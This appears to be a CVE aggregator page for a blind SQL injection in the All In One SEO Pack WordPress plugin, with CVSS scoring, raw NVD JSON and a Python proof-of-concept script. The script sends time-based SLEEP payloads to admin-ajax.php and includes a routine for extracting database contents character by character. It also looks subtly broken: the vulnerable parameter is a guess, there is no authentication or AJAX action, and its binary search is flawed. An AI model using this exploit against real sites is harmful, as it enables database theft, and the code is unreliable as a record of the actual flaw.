Security Vulnerability Report
中文
CVE-2025-67950 CVSS 8.5 HIGH

CVE-2025-67950

Published: 2025-12-16 09:16:00
Last Modified: 2026-04-27 18:16:51

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Syed Balkhi All In One SEO Pack all-in-one-seo-pack allows Blind SQL Injection.This issue affects All In One SEO Pack: from n/a through <= 4.9.1.

CVSS Details

CVSS Score
8.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L

Configurations (Affected Products)

No configuration data available.

All In One SEO Pack <= 4.9.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-67950 Blind SQL Injection PoC # Target: All In One SEO Pack <= 4.9.1 # Author: Security Researcher import requests import time target_url = "http://target-site.com/wp-admin/admin-ajax.php" # Blind SQL Injection payload to extract database version def exploit_blind_sql_injection(): headers = { "User-Agent": "Mozilla/5.0", "Content-Type": "application/x-www-form-urlencoded" } # Base payload - adjust the parameter based on actual vulnerable endpoint base_payload = "aioseo_post_list_view=1" # Extract database version using time-based blind SQL injection # Payload: IF(condition, SLEEP(5), 0) sql_payload = base_payload + " AND (SELECT IF(SUBSTRING(@@version,1,1)='5',SLEEP(5),0))" print("[*] Testing Blind SQL Injection...") print(f"[*] Target: {target_url}") try: start_time = time.time() response = requests.post(target_url, data=sql_payload, headers=headers, timeout=30) elapsed = time.time() - start_time if elapsed >= 5: print("[+] Blind SQL Injection confirmed! Database version starts with '5'") return True else: print("[-] No response delay detected") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False # Binary search to extract data character by character def extract_data(sql_query, position, charset_range): low, high = 0, len(charset_range) - 1 while low <= high: mid = (low + high) // 2 char = charset_range[mid] payload = f"aioseo_post_list_view=1 AND IF(SUBSTRING(({sql_query}),{position},1)='{char}',SLEEP(3),0)" try: start = time.time() requests.post(target_url, data=payload, timeout=10) if time.time() - start >= 3: return char else: # Adjust search range based on response high = mid - 1 except: pass return None if __name__ == "__main__": exploit_blind_sql_injection()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67950", "sourceIdentifier": "[email protected]", "published": "2025-12-16T09:15:59.580", "lastModified": "2026-04-27T18:16:51.233", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Syed Balkhi All In One SEO Pack all-in-one-seo-pack allows Blind SQL Injection.This issue affects All In One SEO Pack: from n/a through <= 4.9.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/all-in-one-seo-pack/vulnerability/wordpress-all-in-one-seo-pack-plugin-4-9-1-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}